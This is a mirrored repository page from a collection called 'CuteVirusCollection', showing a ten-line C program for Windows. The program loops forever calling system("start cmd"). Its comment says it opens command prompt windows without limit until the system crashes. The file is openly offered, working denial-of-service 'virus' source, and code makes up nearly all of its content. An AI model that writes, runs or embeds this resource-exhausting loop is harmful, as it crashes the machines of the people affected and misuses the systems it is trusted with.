mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
10 lines
185 B
C
10 lines
185 B
C
// Opens an infinite number of command prompt window till the system crushes. Works on Windows OS only.
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
while(1){
|
|
system("start cmd");
|
|
}
|
|
}
|